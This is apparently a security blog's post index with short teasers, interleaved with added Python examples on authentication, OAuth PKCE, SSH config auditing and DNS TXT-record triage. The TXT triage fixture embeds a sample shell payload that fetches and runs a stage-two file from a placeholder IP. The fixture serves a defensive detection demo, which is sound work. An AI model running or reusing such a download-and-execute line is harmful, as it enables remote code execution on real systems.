-
Credential Stuffing vs Password Spraying
29. October 2020
At my employer we use Office 365. I’m not a Microsoft advocate; my friends and colleagues know me rather as an Apple fanboy and BSD geek. But I have to admit that Office 365 works well enough. Even in these pandemic times, when we work from home, Teams and the like serve us very well. As part of our security team we also encounter attacks against our user accounts. Maybe you read about it in the press: credential stuffing and password spraying attacks against Office 365 accounts have been going on this year.…more
-
AuthN vs AuthZ
23. October 2020
When you do some “login stuff” nowadays you may have stumbled upon the terms AuthN and AuthZ. Maybe you wondered what the “N” and “Z” mean? Short answer: AuthN stands for Authentication, and AuthZ stands for Authorization. That’s easy, right? We’re done for this blog post 🙃 Authentication vs. Authorization But what is the difference between these two terms? Aren’t they the same? Short answer: No, they aren’t!…more
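The distinction in working code, as an added example that is not part of the original post: authentication proves who the caller is (here a PBKDF2 password check with a constant-time compare), authorization decides what that already-identified principal may do (a role lookup that denies by default). The user store, passwords, roles and action names are constructed for this example.

```python
"""Authentication (who are you?) vs. authorization (what may you do?)."""
import hashlib
import hmac
import os
from dataclasses import dataclass, field

# Constructed user store: PBKDF2 password hashes plus role assignments.
# Names, passwords and roles are made up for this example.
def _pbkdf2(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

@dataclass
class User:
    name: str
    salt: bytes
    pw_hash: bytes
    roles: set = field(default_factory=set)

def make_user(name, password, roles):
    salt = os.urandom(16)
    return User(name, salt, _pbkdf2(password, salt), set(roles))

USERS = {u.name: u for u in [
    make_user("alice", "correct horse battery staple", {"reader", "admin"}),
    make_user("bob", "hunter2", {"reader"}),
]}

# Authorization policy: which roles may perform which action.
POLICY = {"read_report": {"reader", "admin"}, "delete_report": {"admin"}}

def authenticate(username, password):
    """AuthN: prove identity. Returns the User on success, None otherwise.
    Constant-time compare so a wrong password is not distinguishable by timing."""
    user = USERS.get(username)
    if user is None:
        # Still burn the hash time so unknown vs. known usernames look alike.
        _pbkdf2(password, b"\x00" * 16)
        return None
    if not hmac.compare_digest(_pbkdf2(password, user.salt), user.pw_hash):
        return None
    return user

def authorize(user, action):
    """AuthZ: decide whether this (already authenticated) principal may do `action`.
    Deny by default: unknown actions and missing roles both fail."""
    if user is None:
        return False
    allowed = POLICY.get(action, set())
    return bool(user.roles & allowed)

def attempt(username, password, action):
    """Full request path: authenticate first, then authorize.
    Returns 'unauthenticated' (think HTTP 401), 'forbidden' (403) or 'ok'."""
    user = authenticate(username, password)
    if user is None:
        return "unauthenticated"
    if not authorize(user, action):
        return "forbidden"   # we know exactly who you are, and the answer is still no
    return "ok"

if __name__ == "__main__":
    print(attempt("bob", "hunter2", "read_report"))
    print(attempt("bob", "hunter2", "delete_report"))
    print(attempt("bob", "wrong", "read_report"))
```

The point of the two return values: bob with the right password is authenticated but not authorized for `delete_report`; bob with the wrong password never reaches the authorization step at all.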
-
OAuth 2.0 Implicit Flow Considered Harmful
8. October 2020
Certainly I’m not the only one writing on the web that the OAuth 2.0 Implicit Flow is bad for security reasons and deprecated by the OAuth 2.0 Security Best Current Practice and OAuth 2.1. But this can’t be said often enough, so I’ll try my best! This post is a guide for people facing situations where random dudes ask “Why should I bother? See, Microsoft is recommending it!” After reading this post you can tell them why it is a bad idea to use the implicit flow.…more
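To make the contrast concrete, here is an added example (not code from the post) that shows what the implicit flow hands the browser versus how the authorization code flow with PKCE (RFC 7636) binds the code to the client that requested it. The authorization server is a toy in-memory one, and the client id and redirect URI are made up; the PKCE challenge derivation itself is the S256 method from the RFC.

```python
"""OAuth 2.0: token in the URL fragment (implicit flow) vs. authorization code + PKCE."""
import base64
import hashlib
import secrets
from urllib.parse import urlencode, urlparse, parse_qs

def b64url(raw: bytes) -> str:
    """BASE64URL without padding, as RFC 7636 requires."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

# --- the deprecated implicit flow: what the browser ends up with -------------
def implicit_redirect(redirect_uri, access_token):
    """For response_type=token the authorization server puts the bearer token
    itself into the URL fragment. Anything that sees the URL has the token."""
    return redirect_uri + "#" + urlencode({"access_token": access_token,
                                          "token_type": "Bearer", "expires_in": 3600})

def token_from_fragment(url):
    """What a script (the client's, or any other script in the page) can read."""
    return parse_qs(urlparse(url).fragment).get("access_token", [None])[0]

# --- authorization code flow with PKCE ---------------------------------------
def make_pkce_pair(code_verifier=None):
    """Client side: random verifier, S256 challenge derived from it."""
    if code_verifier is None:
        code_verifier = b64url(secrets.token_bytes(32))  # 43 chars, within RFC 7636 limits
    code_challenge = b64url(hashlib.sha256(code_verifier.encode("ascii")).digest())
    return code_verifier, code_challenge

class AuthorizationServer:
    """Toy server: issued codes are bound to the challenge they were requested with."""
    def __init__(self):
        self._codes = {}

    def authorize(self, client_id, redirect_uri, code_challenge, method="S256"):
        if method != "S256":
            raise ValueError("only S256 is acceptable; 'plain' defeats the purpose")
        code = secrets.token_urlsafe(32)
        self._codes[code] = (client_id, redirect_uri, code_challenge)
        # The short-lived, single-use code travels in the query string, not the token.
        return redirect_uri + "?" + urlencode({"code": code})

    def token(self, client_id, redirect_uri, code, code_verifier):
        entry = self._codes.pop(code, None)   # pop: a replayed code fails
        if entry is None:
            return None
        c_id, r_uri, challenge = entry
        if (c_id, r_uri) != (client_id, redirect_uri):
            return None
        # Recompute the challenge from the presented verifier; constant-time compare.
        expected = b64url(hashlib.sha256(code_verifier.encode("ascii")).digest())
        if not secrets.compare_digest(expected, challenge):
            return None
        return {"access_token": secrets.token_urlsafe(32), "token_type": "Bearer"}

def pkce_round_trip(steal_code=False):
    """Client and server run the full exchange. With steal_code=True an attacker
    who captured the code (but not the verifier) tries to redeem it."""
    srv = AuthorizationServer()
    verifier, challenge = make_pkce_pair()
    redirect = srv.authorize("spa-client", "https://app.example/cb", challenge)
    code = parse_qs(urlparse(redirect).query)["code"][0]
    if steal_code:
        attacker_verifier, _ = make_pkce_pair()
        return srv.token("spa-client", "https://app.example/cb", code, attacker_verifier)
    return srv.token("spa-client", "https://app.example/cb", code, verifier)
```

With the implicit flow there is nothing to steal but the token, and it is already in the address bar; with code + PKCE a captured authorization code is worthless without the verifier that never left the client.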
-
Improve Your Documentation With Russian Roulette
21. September 2020
As software dudes we write documentation. Of course we do. Most of the time we write API docs (JavaDoc or such) in the source code. This is not a big deal in my opinion: you do it alongside writing code and tests, and you review it regularly as part of the normal code reviews. Yeah, code reviews are something normal in my world! But sometimes we’re urged to write documentation outside of the source code.…more
-
Hide and Seek in TXT Records
18. September 2020
Did you ever wonder how the “bad guys” hide things? Some time ago John Ferrell wrote about how to hide malicious code in files that look like a good old plain text log file. Last month (August 2020) John Hammond wrote a part two, in which he shows how they download additional payloads from the internet under the radar. It’s quite simple once you know how. What’s the Problem with Payloads So if you are writing malware you face the same problem as any software developer: you want to ship updates.…more
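From the defender's side, the question is how a staged payload in TXT records looks next to the TXT records every domain legitimately has. The following is an added example, not code from the post or from the articles it cites: it triages a constructed set of TXT answers, keeps the documented record grammars (SPF, DMARC, DKIM, site verification; note that DKIM and DMARC legitimately contain base64) out of the way, and reassembles the remaining opaque blobs. The naming scheme for chunks (`<index>.<label>`) and the base64 encoding are assumptions about one common style, not a statement about any specific malware.

```python
"""Triage of DNS TXT answers: separate well-known record grammars from
opaque blobs that could be staged payload chunks, and reassemble the latter."""
import base64
import binascii
import math
import re
from collections import defaultdict

# Constructed sample answers (owner name, TXT string). None of this is live data;
# the chunk naming scheme <index>.<label> is an assumption about one common style.
PAYLOAD = b"#!/bin/sh\ncurl -s http://203.0.113.5/stage2 -o /tmp/.s && chmod +x /tmp/.s && /tmp/.s\n"
B64_BLOB = base64.b64encode(PAYLOAD).decode()
SAMPLE_TXT = [
    ("example.com.", "v=spf1 include:_spf.example.net -all"),
    ("_dmarc.example.com.", "v=DMARC1; p=reject; rua=mailto:dmarc@example.com"),
    ("sel1._domainkey.example.com.", "v=DKIM1; k=rsa; p=" + "A" * 64),  # base64 is normal here
    ("example.com.", "google-site-verification=" + "B" * 43),
    ("0.cdn-upd.example.org.", B64_BLOB[:40]),
    ("1.cdn-upd.example.org.", B64_BLOB[40:80]),
    ("2.cdn-upd.example.org.", B64_BLOB[80:]),
]

KNOWN = re.compile(r"^(v=spf1|v=DMARC1|v=DKIM1|google-site-verification=|MS=ms)", re.I)
B64_CHARS = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
CHUNK_NAME = re.compile(r"^(\d+)\.(.+)$")

def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def classify(name, txt):
    """'known' for documented grammars, 'blob' for base64-looking opaque text, else 'other'."""
    if KNOWN.match(txt):
        return "known"
    if len(txt) >= 16 and B64_CHARS.match(txt) and shannon_entropy(txt) > 3.5:
        return "blob"
    return "other"

def reassemble_blobs(answers):
    """Group 'blob' records by parent name, order by numeric chunk index, join and
    base64-decode. Returns {parent: decoded_bytes} for groups that decode cleanly."""
    groups = defaultdict(dict)
    for name, txt in answers:
        if classify(name, txt) != "blob":
            continue
        m = CHUNK_NAME.match(name)
        if m:
            groups[m.group(2)][int(m.group(1))] = txt
        else:
            groups[name][0] = txt
    out = {}
    for parent, chunks in groups.items():
        joined = "".join(chunks[i] for i in sorted(chunks))
        try:
            out[parent] = base64.b64decode(joined, validate=True)
        except (binascii.Error, ValueError):
            continue
    return out

def triage(answers=SAMPLE_TXT):
    """What an analyst wants to see: record counts per class, reassembled blobs,
    and which of those decode to something that looks like a script."""
    counts = defaultdict(int)
    for name, txt in answers:
        counts[classify(name, txt)] += 1
    payloads = reassemble_blobs(answers)
    scripts = {p: d for p, d in payloads.items() if d.startswith(b"#!") or b"| sh" in d}
    return dict(counts), payloads, scripts
```

Run `triage()` over real passive-DNS output with the same (name, txt) shape; the allow-list of known grammars is what keeps DKIM keys from drowning the result, so extend it for whatever else your zones legitimately publish.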
-
Frauenquote
29. May 2020
Disclaimer: I am a man, and on this topic we men really ought to keep our mouths firmly shut, because we are not the ones affected! So why am I writing something about it anyway? Recently my colleague Stefan Rauch wrote about the Frauenquote (women’s quota). I commented that in my opinion it will only work with a quota: Unfortunately it only works with a quota. That alone shows how little has changed in the last decades.…more
Tags: Miscellaneous, Quote, Frauenquote, Diversity, Equality, Emancipation, Feminism
-
Please Use Semantic Versioning
22. May 2020
TL;DR: Please use Semantic Versioning, and please use it right! This is a little rant about tools, libs and frameworks not using Semantic Versioning. This morning I was triggered on Twitter by the announcement of Terraform version 0.13. My first thought was: WTF! Why are you still at 0.x with software that is widely used in production? Disclaimer: I use Terraform myself and I like it. Scrolling through my timeline I saw various other announcements like 0.…more
-
My Opinion on Zoom
15. May 2020
TL;DR: Do not use Zoom at all! If you have to: use it on iOS or in the browser. Nowadays we use lots of video conferencing to practice physical distancing. A major player in the field is Zoom. One reason for that is their good software quality. At least on the surface it looks that way, because the inner software quality seems not that good.…more
-
Hardening Your SSHd With Ansible
8. May 2020
Disclaimer: This is not a beginner tutorial. You should have a basic understanding of and some experience with Linux and Ansible. Whenever you run a server in the wild wild web you should harden your SSHd setup. If you wonder why, spin up a machine with SSHd enabled and watch the logs: usually it takes only a few minutes until the first scans and brute-force attacks show up.…more
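Whatever tool applies the hardening, you want to verify the result on the box. The following is an added example, not the Ansible role from the post: it parses an `sshd_config` the way sshd reads it (case-insensitive keywords, first occurrence of a directive wins, lines starting with `#` are comments) and checks the effective values against a small baseline, falling back to the OpenSSH defaults for directives that are absent. The two configs are constructed for the demonstration; the baseline is one opinionated set of settings, not a complete hardening guide, and anything inside a `Match` block is deliberately out of scope.

```python
"""Check an sshd_config against a small hardening baseline.

sshd semantics that matter here: keywords are case-insensitive, the FIRST
occurrence of a directive wins, lines starting with '#' are comments, and
everything after the first 'Match' line is conditional (flagged, not evaluated)."""
import shlex

# Values sshd uses when a directive is absent (OpenSSH 7.0+ defaults).
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "permitemptypasswords": "no",
    "pubkeyauthentication": "yes",
    "x11forwarding": "no",
    "maxauthtries": "6",
}

# Baseline: directive -> predicate on the effective (lower-cased) value.
BASELINE = {
    "permitrootlogin": lambda v: v in ("no", "prohibit-password"),
    "passwordauthentication": lambda v: v == "no",
    "permitemptypasswords": lambda v: v == "no",
    "pubkeyauthentication": lambda v: v == "yes",
    "x11forwarding": lambda v: v == "no",
    "maxauthtries": lambda v: v.isdigit() and int(v) <= 3,
}

def parse_sshd_config(text):
    """Return (effective global directives, whether a Match block was seen)."""
    effective, saw_match = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        key = parts[0].lower()
        if key == "match":
            saw_match = True
            break                      # conditional section: out of scope here
        value = " ".join(parts[1:]).lower() if len(parts) > 1 else ""
        if "=" in key and len(parts) == 1:   # "PermitRootLogin=no" form
            key, value = (x.strip() for x in key.split("=", 1))
        effective.setdefault(key, value)     # first occurrence wins
    return effective, saw_match

def audit(text):
    """List of findings; an empty list means the baseline is met."""
    effective, saw_match = parse_sshd_config(text)
    findings = []
    for directive, ok in BASELINE.items():
        value = effective.get(directive, DEFAULTS[directive])
        if not ok(value):
            origin = "set" if directive in effective else "default"
            findings.append(f"{directive} is '{value}' ({origin}), fails baseline")
    if saw_match:
        findings.append("Match block present: conditional settings not evaluated")
    return findings

# Constructed configs for the demonstration (not from the post's Ansible role).
WEAK_CONFIG = """
Port 22
PermitRootLogin yes
X11Forwarding yes
PasswordAuthentication yes
# the next line is ignored by sshd: the first occurrence above wins
PasswordAuthentication no
"""

HARDENED_CONFIG = """
Port 22
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
PubkeyAuthentication yes
X11Forwarding no
MaxAuthTries 3
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg) or ["baseline met"])
```

The weak config produces four findings: the three directives it sets badly plus `MaxAuthTries`, which it never mentions and therefore inherits as 6. Run `audit()` on the output of `sshd -T` if you want the daemon's own view of the effective configuration instead of parsing the file.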
-
It Is Not Just the Flu
30. April 2020
There are a lot of opinions out there about SARS-CoV-2 (aka Corona). Lots of them state that COVID-19 (the disease caused by a SARS-CoV-2 infection) is nothing more than the good ol’ flu. But this opinion is BS! Although I’m more a technical guy interested in computer stuff and security, I feel the urge to say some words about this topic to provide a counterweight. Because the ill-informed opinion that SARS-CoV-2 is just like the flu threatens the security of the health of my family, my friends and me!…more